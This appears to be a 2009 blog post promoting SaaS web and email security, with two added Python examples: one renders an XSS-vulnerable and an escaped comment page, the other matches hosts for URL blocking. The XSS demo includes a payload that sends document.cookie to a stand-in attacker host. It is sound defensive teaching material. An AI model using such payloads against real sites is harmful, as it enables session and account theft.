Web security using SaaS

Tuesday, May 5, 2009

1. Introduction

The demand for more comprehensive Web security solutions has been fueled by the increasing sophistication of Web-based threats that reach far beyond productivity, bandwidth, and liability issues. The Web has become the new threat vector of choice for hackers and cyber criminals to distribute malware and perpetrate identity theft, financial fraud, and corporate espionage. As a growing number of Web 2.0 applications make their way into the enterprise, they bring with them even more security concerns and attack vectors. Many small and medium-sized business (SMB) organizations lack the in-house capabilities to keep up with the evolving threat landscape. These factors are driving the growing interest in software as a service (SaaS) security.

Spending will be affected by the economic slowdown, so organizations need to rethink how they manage non-core yet critical tasks such as Web and email security.

There are three truisms about a tight economy that every IT manager knows:

  • Support more projects with fewer people and tighter budgets
  • Approvals for infrastructure build-outs are scarce
  • Employee productivity must remain high

These may seem like Herculean tasks, especially when you're dealing with ever-increasing threats to your Web and email infrastructure.

2. Vulnerability of the Web

A growing amount of malicious code exploits weaknesses in protocols (e.g., HTTP, POP3, FTP, and HTTPS) and in Web browsers, and infected Web pages have become a more prominent way to compromise a visitor's computer remotely, without the visitor having to click on any link or open any email attachment (a so-called drive-by download). The number of Web sites distributing malware has grown explosively as malware authors extend their distribution channels. As a result, Web security is a growing concern for organizations, and Web security solutions will play an increasingly important role.

A hack-resilient application is one that reduces the likelihood of a successful attack and mitigates the extent of damage if an attack occurs. A hack-resilient application resides on a secure host (server) in a secure network and is developed using secure design and development guidelines.

Web application security must be addressed across the tiers and at multiple layers. A weakness in any tier or layer makes your application vulnerable to attack.

Web Security Model

2.1 Threats to Enterprise Security

According to an annual security survey of IT and security professionals, the top threats to a company's network security include the following:

Exposure of confidential information - Web email or Web posting (e.g., message board, blog) accounted for 37% of information leaks.

Trojans, viruses, worms, and other types of malicious code - Virus writers and hackers increasingly leverage the popularity of Web 2.0 sites in order to reach the greatest number of users.

Spam - Spam messages use encryption and obfuscation to hide malicious code and evade detection by content scanners.

Spyware secretly monitors the user's behavior and collects various types of personal information, such as Internet surfing habits and the sites that have been visited. This can result in slow connection speeds, changed home pages, theft of confidential information, loss of productivity, consumption of large amounts of bandwidth, and corruption of desktops.

Cross-site scripting (XSS) allows a malicious user to inject code into the Web pages viewed by other users. Attackers inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application so that it executes in the victim's browser, in the context of the vulnerable site, and hands data back to the attacker. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible.
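As an added example (not from the original post), the following Python script shows the flaw just described in its vulnerable and hardened forms: a comment page that splices user input straight into HTML, and the same page with output encoding applied. The attacker inputs, the page template, the function names and the small parser-based audit are all constructed for this demonstration.

```python
"""
Added example, not from the original post: a page that splices user input into
HTML (the XSS flaw described above) beside the hardened version that encodes
output for its context. The attacker inputs, template and names are constructed.
"""
import html
from html.parser import HTMLParser

# Constructed attacker inputs: one adds a tag in text context, the other breaks
# out of a double-quoted attribute and adds an event handler.
ATTACKER_COMMENT = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
ATTACKER_NAME = '" onmouseover="alert(document.cookie)'


def render_vulnerable(name: str, comment: str) -> str:
    """Trusts user data as markup; the browser runs whatever the attacker typed."""
    return (f'<div class="comment" data-author="{name}">'
            f'<p>{comment}</p></div>')


def render_hardened(name: str, comment: str) -> str:
    """Encodes every untrusted value for the context it lands in.

    html.escape(..., quote=True) turns < > & " and ' into entities, which is
    correct for text content and for quoted attribute values. URL, JavaScript
    and CSS contexts need their own encoders and are not covered here.
    """
    return (f'<div class="comment" data-author="{html.escape(name, quote=True)}">'
            f'<p>{html.escape(comment, quote=True)}</p></div>')


class _TagAudit(HTMLParser):
    """Parses a rendered page the way a browser would and records the things
    an injected payload needs: script elements and on* event attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.event_handlers.append(attr_name)


def audit(page: str) -> dict:
    """Returns what an injected payload achieved in the rendered page."""
    parser = _TagAudit()
    parser.feed(page)
    parser.close()
    return {"script_tags": parser.script_tags,
            "event_handlers": parser.event_handlers}


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        page = render(ATTACKER_NAME, ATTACKER_COMMENT)
        print(label, audit(page))
        print("  ", page)
```

Encoding is applied where the data is written into the page, not where it is received, because the same string can be harmless in one context and executable in another; the attribute payload above shows that quote characters matter as much as angle brackets.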

SQL injection happens when a developer places user input directly into a SQL statement without properly handling the characters that have meaning to the database (quotes, comment markers). This can allow an attacker not only to read data from your database but also to modify and delete it. Parameterized queries, which keep the data separate from the statement text, are the standard defence.

Content spoofing is an attack technique used to trick a user into believing that certain content appearing on a Web site is legitimate, when it was in fact supplied by an attacker from an external source.

With new viruses and malicious Web sites popping up with abandon, IT organizations have had to become security gurus, chasing down signatures piece-meal, pushing out updated policies, and adding to URL blacklists, all while being careful not to hamper user productivity with application downtime and false positives.

3. What is SaaS?

Software as a Service ( SaaS ) is a model of software deployment whereby a provider licenses an application to customers for use as a service on demand.

Traditionally, the user purchases a software package and license by paying a one-time fee. The software thereby becomes the property of the user who made the purchase. Software support and updates are provided by the vendor or developer under the terms of the license agreement.

SaaS, on the other hand, is not sold as a perpetual license. Rather than a single fee, payment for the use of the software is through subscription, and the user's access ends when he stops paying subscription fees. Moreover, the software is not downloaded to the user's computer. Gmail or Hotmail, for example, is not "resident" on your computer: you access and use it through the Internet, but it is not loaded and stored on your computer.

This enables the organizations to dynamically add or subtract users based on their growth, paying only for what they need, when they need it. Also, because SaaS is essentially a subscription, companies can count application usage as an operating expense as opposed to a complicated—and depreciating—capital expenditure. In fact, one research firm found that a SaaS solution can reduce the annual application cost per user from $100 to $60 versus a traditional appliance based solution.

SaaS Delivery Model

SaaS is often divided into two major categories:

  • The so-called "line of business services", which refers to business solutions offered to companies and enterprises, and sold or made available to these enterprises on a subscription basis. Applications covered under this category include business processes such as supply-chain management programs, customer relationship management applications and others.
  • Customer-oriented services which are offered to the general public either on a subscription basis or offered for free but are supported by advertising. Web-based email services such as Gmail, HotMail fall into this general category.

SaaS also gives companies leverage over on-premise solutions because the service is governed by a service level agreement. This key differentiator means that companies have a contract with the service provider that commits it to defined performance and availability targets.

4. SaaS to the rescue

Many IT departments continue to experience budgetary pressures with regard to proper staffing levels while simultaneously being asked to provide higher levels of network accessibility, business continuity, and a higher degree of security. IT departments are tasked with the challenging role of ensuring business continuity even as they are being asked to secure a rapidly increasing pool of protocols (e.g., Web, email, instant messaging) with constrained administration staff sizes. The cost associated with training the IT staff on multiple security consoles can be a burden for corporate IT budgets and staff. This is especially true in the Small and Medium sized business (SMB) environment.

Where the SaaS model really hits home is with Web and email security, because it gives IT teams a way to stop threats before they clog, or take down, the network: traffic is inspected and filtered in the provider's cloud before it reaches the customer's infrastructure.

The business benefits of a SaaS security approach include:

  • Fixed annual service fees for Web security
  • Simplified and predictable annual budgeting for security
  • Reduced administrative workload for security
  • No need for additional purchase of hardware
  • No need for software license acquisitions
  • No implementation costs

The technical benefits of a SaaS security model include:

  • Web filtering of traffic that occurs "in the cloud" so that dangerous and unwanted traffic never reaches the business' infrastructure
  • Maximized network bandwidth, achieved as a result of the out-of-band elimination of unwanted and dangerous traffic
  • Centralized and granular security policy management and enforcement
  • HTTP and FTP traffic scanning and filtering
  • Up-to-date signature and heuristic-based virus and spyware scanning technologies
  • URL blocking to manage user browsing
  • Centralized alerts and reporting
  • Consistent protection for roaming PCs
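As an added example (not from the original post, and not any vendor's implementation), here is the host-matching core of the URL blocking and policy enforcement listed above, in Python. The policy, the categories and the sample URLs are constructed, and the code concentrates on the cases a naive substring match gets wrong: subdomains, lookalike registrable domains, userinfo in the URL, and raw IP literals.

```python
"""
Added example, not from the original post or any vendor's product: the host
matching at the core of URL blocking, with the cases a naive substring match
gets wrong. Policy, categories and sample URLs are constructed.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed policy. An entry covers the domain and every subdomain under it.
CATEGORY_BY_DOMAIN = {
    "malware-host.invalid": "malware",
    "phish.invalid": "phishing",
    "video.example": "streaming",
}
BLOCKED_CATEGORIES = {"malware", "phishing"}


def normalize_host(url: str) -> str:
    """Lowercase host with port, userinfo and trailing dot removed, or "" when
    the URL carries no host at all."""
    # urlsplit().hostname already drops 'user:pass@' and ':port' and lowercases,
    # so 'http://bank.example@phish.invalid/' yields 'phish.invalid'.
    host = urlsplit(url.strip()).hostname or ""
    return host.rstrip(".")


def lookup_category(host: str) -> str:
    """Matches the host's label suffixes from longest to shortest, so
    'cdn.phish.invalid' hits 'phish.invalid' while 'phish.invalid.example'
    (a different registrable domain) does not."""
    labels = host.split(".")
    for i in range(len(labels)):
        category = CATEGORY_BY_DOMAIN.get(".".join(labels[i:]))
        if category is not None:
            return category
    return "uncategorized"


def decide(url: str, block_ip_literals: bool = True) -> tuple:
    """Policy decision as (action, reason)."""
    host = normalize_host(url)
    if not host:
        return ("block", "no host")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # a name, not an IP literal
    else:
        # Raw IP addresses sidestep name-based categorization, so by default
        # they are blocked rather than treated as uncategorized.
        return ("block" if block_ip_literals else "allow", "ip-literal")
    category = lookup_category(host)
    return ("block" if category in BLOCKED_CATEGORIES else "allow", category)


if __name__ == "__main__":
    for url in ("http://www.malware-host.invalid/dl.exe",
                "https://CDN.Phish.Invalid.:8443/login",
                "http://phish.invalid.example/",
                "http://bank.example@phish.invalid/login",
                "http://203.0.113.5/",
                "http://video.example/"):
        print(f"{decide(url)!s:28} {url}")
```

A production gateway adds what this sketch leaves out: a maintained category database, decoding of internationalized (punycode) host names, categorization of the full URL rather than the host alone, and, for HTTPS, either the TLS server name or interception, since the path is otherwise invisible to the filter.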

SaaS will play a key role in reducing administrative and support costs and, ultimately, in reducing the total cost of ownership (TCO) of managing multiple security technologies. The bottom line from a business perspective and an IT perspective is reducing the cost of managing the perimeter security side of the IT infrastructure. We believe corporations will look for SaaS security solutions that can address both cost and security concerns to an equal degree.

4.1 Convergence of Web and Messaging Security

Because of the blended nature of today's more sophisticated threats, the need for security vendors to address both Web and messaging (WAM) protocols is becoming more critical. Organizations are constantly under pressure to stay ahead of financially motivated cyber criminals launching sophisticated attacks (e.g., blended threats that combine spam, spyware, viruses, malicious URLs, and other malware in their attacks). The ever-changing threat landscape ensures the need for continued investments in security technologies that can address the blended threat environment.

SaaS represents a great opportunity to deliver multi tier protection against blended threats that combine the use of the Web and email as attack vectors. We predict that many organizations, especially SMB environments, will look for solutions that can address both Web and messaging threats.

As SMBs and other businesses continue to look for more cost-effective means of monitoring, protecting and managing their security infrastructures, SaaS offerings will continue to be an attractive option.

4.2 Cutting-edge Tools and Services

Zscaler SaaS - Zscaler provides risk mitigation and policy enforcement for businesses through its in-the-cloud utility service, while enriching the user's Internet experience. Organizations do not need to purchase, deploy, or manage countless point products. Companies simply define their corporate security control and compliance policy by accessing the Zscaler utility.

Zscaler's in-the-cloud utility enables seamless, appliance-less policy enforcement and malware protection for multiple locations, mobile devices and road warriors.

Webroot SaaS uses a combination of multiple best-of-breed anti-virus and anti-spam engines as well as its own anti-spyware tool, Spy Sweeper, and an automated threat research system to keep its Web Security and Email Security services cutting edge. Users are also protected by zero-hour heuristic filters that guard against new and unknown virus variants and keep false positives low. And because traffic is filtered through Webroot data centers, distributed denial-of-service attacks can be absorbed before they reach corporate mail servers. Using the multi-vendor approach for anti-virus engines also allows Webroot to offer a high-quality, inexpensive SaaS solution without compromising security.

Webroot Spy Sweeper

Webroot Email and Spam Scanner

4.3 SaaS Benefits

SaaS provides a more efficient software application delivery process for Independent Software Vendors (ISVs), Service Providers and End-user Customers.

Service Providers

As a service provider, you can earn 10-50 times more revenue per customer by hosting software applications in addition to infrastructure services. For example, assume you sell $50/month of web hosting to a company with 50 end users. If you up-sell collaboration and inventory management software, you can easily make $20/person for a total of $1,000 per month from the same customer.

SaaS also allows service providers to attract new customers that need software applications but do not have the IT resources or capital budgets to purchase them.

Independent Software Vendors (ISVs)

ISVs have traditionally had difficulty reaching the small and medium sized business market which is served by service providers. The SaaS model provides a new way for ISVs to distribute and market their software.

The benefits include:

  • Deployment Costs - software can be deployed into a centralized controlled environment which will reduce help desk calls and support costs
  • Upgrades - customers can be quickly upgraded to the latest releases without the traditional hassles of deployment and installation
  • Recurring Revenue - predictable monthly payments provide better stability
  • Support - deliver support to service providers instead of end user customers
  • Markets - reach small and medium sized businesses which may not have been able to afford, or lacked the expertise to deploy, complex applications, and reach enterprises that may be willing to purchase a few seats to try your software before doing a full deployment. Deploy the application yourself through the use of Parallels Automation and Virtualization products.

End Users

The benefits that the SaaS delivery model brings to the end user (individuals, SMBs and corporate clients) are the main driver for companies changing the way they think about software deployment.

Some of these benefits include:

  • Financial Benefits - software is subscribed to and not purchased, therefore expenses are not front loaded and are made up of predictable monthly fees
  • Ease of Use – access applications anywhere the internet is available through your web browser
  • Maintenance - software deployment and maintenance is handled elsewhere - allowing customers to focus on their core competencies to run their business
  • Upgrades/Patches – you always get the latest version and security updates; automatically, no need to spend time updating each of your computers
  • Centralized Data - all data is centralized into one secure datacenter instead of spread through the world on local PCs and servers
  • Uptime - server applications are hosted in a datacenter so power outages and Internet outages are isolated from incidents that affect local offices

4.4 Getting the most from SaaS

Signing on with a software as-a-service (SaaS) provider may have you worried that you are giving up control, but that doesn't have to be the case. Here are some surefire ways to guarantee you stay in the driver's seat.

1. Try before you buy. There's no better way to understand how SaaS will benefit your environment than seeing results for yourself. While this can be cumbersome with appliances and on-premise solutions, SaaS offerings make evaluating the benefits of Web and email security as easy as pointing your browsers or proxy at the provider's service or altering your domain's MX record. You can even send production traffic through the SaaS provider's environment to check real-time latency and the other impacts on the end-user experience.

2. Get it in writing. The most important part of any SaaS offering is the service level agreement ( SLA ), which outlines your provider's guarantees. You'll want to make sure that the SLA covers performance, uptime, notification of downtime, and other critical factors as well as the repercussions for failing to meet those guarantees. For instance, your provider should offer 24/7 availability. You'll also want a false-positive rate for catching viruses that is lower than 1 in 400,000. To ensure these metrics are being met, have your provider send you regular reports.

3. Know your compliance mandates. When it comes to security, it's imperative that you understand the guidelines for data protection that your company must follow. For example, do you have requirements that dictate how long you have to retain business records or privacy restrictions regarding customer information? Develop policies that reflect these mandates and then convey them to your SaaS provider. Together you'll be able to conduct audits that ensure ongoing compliance.

4. Share your SaaS success. It's easy to measure the success of a SaaS solution. For instance, if your email security solution is stopping 98% of the spam that would otherwise have to be handled by your network, then that's a tremendous savings in terms of bandwidth and server capacity. Or if your Web security service has blocked hundreds of attempts by employees to visit “bad” sites, then you've essentially stopped malware from taking down the network and increased worker productivity. Make sure to share these benefits with corporate executives so they understand the business value of your SaaS decision.

5. Enjoy your newfound freedom. With SaaS, you no longer need a dedicated employee to chase down the latest virus signatures, test and deploy patches, or update URL blacklists. All this is handled automatically as part of your service. You also don't have to spend time purchasing, provisioning and maintaining hardware, software or appliances in-house and at remote locations. This means that you can redeploy staff to more strategic and mission critical tasks.
